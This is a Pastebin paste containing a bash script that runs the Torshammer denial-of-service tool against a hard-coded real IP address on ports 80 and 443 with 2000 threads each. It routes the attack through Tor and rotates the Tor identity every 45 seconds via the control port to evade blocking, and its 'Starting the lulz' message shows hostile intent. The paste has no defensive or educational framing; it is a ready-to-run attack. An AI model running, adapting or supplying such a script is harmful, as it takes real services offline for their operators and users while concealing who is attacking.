Advertisement
Guest User

Untitled

a guest
May 26th, 2019
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. #!/bin/bash
  2. #echo "Enter IP"
  3. #read target
  4. #echo "Enter Port"
  5. #read port
  6. echo "Starting the lulz..."
  7. screen -d -m python torshammer.py -t 107.154.113.9 -p 80 -r 2000 -T
  8. screen -d -m python torshammer.py -t 107.154.113.9 -p 443 -r 2000 -T
  9. counter=1
  10. while [ $counter -ne 0 ]
  11. do
  12. sleep 45
  13. echo Changing IP
  14. printf 'AUTHENTICATE "Tupac7"\r\nSIGNAL NEWNYM\r\n' | nc 127.0.0.1 9050
  15.  
  16. ((counter++))
  17. done
  18. echo All done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement